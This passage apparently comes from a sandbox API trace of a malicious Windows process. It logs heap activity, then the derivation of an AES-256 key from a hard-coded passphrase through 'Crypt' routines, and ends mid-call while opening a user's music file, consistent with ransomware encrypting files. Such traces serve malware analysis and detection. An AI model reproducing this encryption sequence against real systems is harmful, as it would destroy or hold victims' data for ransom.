[0111.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0111.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0111.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0111.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0111.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0111.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0111.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0111.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0111.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0111.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0111.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0111.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0111.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0111.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0111.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0111.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0111.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0111.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0111.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0111.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0111.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0111.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0111.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0111.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0111.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0111.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0111.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0111.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0111.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0111.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0111.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0111.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0111.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0111.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0111.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0111.873] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0111.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e97a0 | out: hHeap=0x1780000) returned 1 [0111.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0111.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0111.874] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0111.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0111.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0111.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0111.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0111.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0111.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0111.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0111.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0111.874] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0111.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0111.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0111.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0111.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0111.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0111.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0111.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0111.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0111.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0111.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0111.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0111.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0111.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0111.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0111.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0111.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0111.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0111.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0111.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0111.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0111.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0111.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391e00 | out: hHeap=0x1780000) returned 1 [0111.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0111.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0111.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0111.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0111.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0111.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0111.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0111.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0111.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0111.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0111.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0111.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431dcf8 | out: hHeap=0x1780000) returned 1 [0111.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0111.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0111.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0111.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0111.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0111.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0111.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0111.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0111.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0111.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0111.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea040 | out: hHeap=0x1780000) returned 1 [0111.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0111.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0111.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0111.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0111.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0111.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0111.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0111.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0111.876] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0111.876] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0111.876] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca280, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0111.876] CloseHandle (hObject=0x258) returned 1 [0111.876] FreeLibrary (hLibModule=0x772d0000) returned 1 [0111.876] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0111.877] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\D4sWWmt- Hf4jGE2.mp3", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa25e60, ftCreationTime.dwHighDateTime=0x1d5ef94, ftLastAccessTime.dwLowDateTime=0xaaabc190, ftLastAccessTime.dwHighDateTime=0x1d5e676, ftLastWriteTime.dwLowDateTime=0xaaabc190, ftLastWriteTime.dwHighDateTime=0x1d5e676, nFileSizeHigh=0x0, nFileSizeLow=0xfc5a, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="D4sWWmt- Hf4jGE2.mp3", cAlternateFileName="D4SWWM~1.MP3")) returned 0x41ac600 [0111.877] FindClose (in: hFindFile=0x41ac600 | out: hFindFile=0x41ac600) returned 1 [0111.877] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0111.877] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0111.877] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0111.877] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0111.877] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0111.877] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0111.877] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796d68, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0111.877] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0111.877] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796fc8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0111.877] CryptAcquireContextA (in: phProv=0x144e7b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e7b0*=0x41a5360) returned 1 [0111.878] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0111.878] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0111.878] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0111.878] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0111.878] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0111.878] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0111.878] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0111.878] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0111.878] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0111.878] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0111.878] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca8f8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0111.879] CryptCreateHash (in: hProv=0x41a5360, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e520 | out: phHash=0x144e520) returned 1 [0111.879] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0111.879] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b48, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0111.879] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0111.879] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0111.879] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2848, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0111.879] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0111.879] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0111.879] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0111.879] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca9e8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0111.879] CryptHashData (hHash=0x41ac740, pbData=0x17e2bd8, dwDataLen=0x22, dwFlags=0x1) returned 1 [0111.879] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0111.879] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0111.879] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0111.879] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0111.879] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca880, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0111.879] CryptDeriveKey (in: hProv=0x41a5360, Algid=0x6610, hBaseData=0x41ac740, dwFlags=0x1, phKey=0x144e520 | out: phKey=0x144e520*=0x41ac600) returned 1 [0111.880] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0111.880] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0111.880] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0111.880] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796fc8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0111.880] CryptDestroyHash (hHash=0x41ac740) returned 1 [0111.880] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0111.880] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e97a0 [0111.880] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0111.880] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0111.880] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0111.880] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0111.880] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0111.880] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0111.880] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0111.880] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0111.880] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0111.880] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0111.880] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0111.880] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0111.881] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0111.881] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0111.881] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0111.881] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0111.881] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0111.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0111.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e97a0 [0111.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0111.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac040 [0111.952] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0111.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac040 | out: hHeap=0x1780000) returned 1 [0111.952] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0111.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac280 | out: hHeap=0x1780000) returned 1 [0111.952] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0111.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0111.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0111.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0111.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0111.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0111.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0111.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0111.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0111.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0111.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac040 [0111.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43eaa90 [0111.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0111.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0111.952] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\D4sWWmt- Hf4jGE2.mp3" (normalized: "c:\\users\\fd1hvy\\music\\9smmb260b1u\\d4swwmt- hf4jge2.mp3"), 